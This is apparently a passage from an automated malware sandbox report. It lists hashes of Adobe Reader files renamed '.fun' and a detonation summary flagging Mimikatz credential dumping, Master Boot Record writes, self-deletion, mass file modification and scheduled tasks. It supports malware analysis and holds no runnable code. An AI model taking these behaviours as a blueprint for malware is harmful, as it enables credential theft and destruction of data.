| SHA256 | 5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb |
| SHA512 | b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun
| MD5 | 2884524604c89632ebbf595e1d905df9 |
| SHA1 | b6053c85110b0364766e18daab579ac048b36545 |
| SHA256 | ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f |
| SHA512 | 0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun
| MD5 | 65368c6dd915332ad36d061e55d02d6f |
| SHA1 | fb4bc0862b192ad322fcb8215a33bd06c4077c6b |
| SHA256 | 6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f |
| SHA512 | 8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun
| MD5 | 0d35b2591dc256d3575b38c748338021 |
| SHA1 | 313f42a267f483e16e9dd223202c6679f243f02d |
| SHA256 | 1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa |
| SHA512 | f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun
| MD5 | 433755fcc2552446eb1345dd28c924eb |
| SHA1 | 23863f5257bdc268015f31ab22434728e5982019 |
| SHA256 | d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b |
| SHA512 | de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun
| MD5 | 781ed8cdd7186821383d43d770d2e357 |
| SHA1 | 99638b49b4cfec881688b025467df9f6f15371e8 |
| SHA256 | a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4 |
| SHA512 | 87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun
| MD5 | 72269cd78515bde3812a44fa4c1c028c |
| SHA1 | 87cada599a01acf0a43692f07a58f62f5d90d22c |
| SHA256 | 7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7 |
| SHA512 | 3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun
| MD5 | eda4add7a17cc3d53920dd85d5987a5f |
| SHA1 | 863dcc28a16e16f66f607790807299b4578e6319 |
| SHA256 | 97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2 |
| SHA512 | d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun
| MD5 | 7dbb12df8a1a7faae12a7df93b48a7aa |
| SHA1 | 07800ce598bee0825598ad6f5513e2ba60d56645 |
| SHA256 | aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77 |
| SHA512 | 96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun
| MD5 | 82a2e835674d50f1a9388aaf1b935002 |
| SHA1 | e09d0577da42a15ec1b71a887ff3e48cfbfeff1a |
| SHA256 | 904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb |
| SHA512 | b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun
| MD5 | 150c9a9ed69b12d54ada958fcdbb1d8a |
| SHA1 | 804c540a51a8d14c6019d3886ece68f32f1631d5 |
| SHA256 | 2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43 |
| SHA512 | 70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun
| MD5 | 0c680b0b1e428ebc7bff87da2553d512 |
| SHA1 | f801dedfc3796d7ec52ee8ba85f26f24bbd2627c |
| SHA256 | 9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750 |
| SHA512 | 2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun
| MD5 | be26a499465cfbb09a281f34012eada0 |
| SHA1 | b8544b9f569724a863e85209f81cd952acdea561 |
| SHA256 | 9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5 |
| SHA512 | 28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun
| MD5 | 2de4e157bf747db92c978efce8754951 |
| SHA1 | c8d31effbb9621aefac55cf3d4ecf8db5e77f53d |
| SHA256 | 341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9 |
| SHA512 | 3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun
| MD5 | ad091690b979144c795c59933373ea3f |
| SHA1 | 5d9e481bc96e6f53b6ff148b0da8417f63962ada |
| SHA256 | 7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1 |
| SHA512 | 23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun
| MD5 | 6e333be79ea4454e2ae4a0649edc420d |
| SHA1 | 95a545127e10daea20fd38b29dcc66029bd3b8bc |
| SHA256 | 112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36 |
| SHA512 | bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun
| MD5 | b8454390c3402747f7c5e46c69bea782 |
| SHA1 | e922c30891ff05939441d839bfe8e71ad9805ec0 |
| SHA256 | 76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d |
| SHA512 | 22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun
| MD5 | 3ae8789eb89621255cfd5708f5658dea |
| SHA1 | 6c3b530412474f62b91fd4393b636012c29217df |
| SHA256 | 7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a |
| SHA512 | f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun
| MD5 | b7c62677ce78fbd3fb9c047665223fea |
| SHA1 | 3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8 |
| SHA256 | aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2 |
| SHA512 | 9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun
| MD5 | 117d6f863b5406cd4f2ac4ceaa4ba2c6 |
| SHA1 | 5cac25f217399ea050182d28b08301fd819f2b2e |
| SHA256 | 73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362 |
| SHA512 | e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun
| MD5 | 51da980061401d9a49494b58225b2753 |
| SHA1 | 3445ffbf33f012ff638c1435f0834db9858f16d3 |
| SHA256 | 3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44 |
| SHA512 | ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun
| MD5 | 2863e8df6fbbe35b81b590817dd42a04 |
| SHA1 | 562824deb05e2bfe1b57cd0abd3fc7fbec141b7c |
| SHA256 | 7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad |
| SHA512 | 7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun
| MD5 | 79f6f006c95a4eb4141d6cedc7b2ebeb |
| SHA1 | 012ca3de08fb304f022f4ea9565ae465f53ab9e8 |
| SHA256 | e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e |
| SHA512 | c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun
| MD5 | b88e3983f77632fa21f1d11ac7e27a64 |
| SHA1 | 03a2b008cc3fe914910b0250ed4d49bd6b021393 |
| SHA256 | 8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5 |
| SHA512 | 5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun
| MD5 | f77086a1d20bca6ba75b8f2fef2f0247 |
| SHA1 | db7c58faaecd10e4b3473b74c1277603a75d6624 |
| SHA256 | cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d |
| SHA512 | a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun
| MD5 | e03c9cd255f1d8d6c03b52fee7273894 |
| SHA1 | d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e |
| SHA256 | 22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6 |
| SHA512 | d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun
| MD5 | 62b1443d82968878c773a1414de23c82 |
| SHA1 | 192bbf788c31bc7e6fe840c0ea113992a8d8621c |
| SHA256 | 4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24 |
| SHA512 | 75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun
| MD5 | bca915870ae4ad0d86fcaba08a10f1fa |
| SHA1 | 7531259f5edae780e684a25635292bf4b2bb1aac |
| SHA256 | d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037 |
| SHA512 | 03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun
| MD5 | 14145467d1e7bd96f1ffe21e0ae79199 |
| SHA1 | 5db5fbd88779a088fd1c4319ff26beb284ad0ff3 |
| SHA256 | 7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38 |
| SHA512 | 762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7 |
memory/4828-3793-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/4828-3794-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/4828-3795-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240708-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B3F4.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASK.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREQ.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKACC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\PushConnect.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed9 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B3F4.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B3F4.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B3F4.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B3F4.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B3F4.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
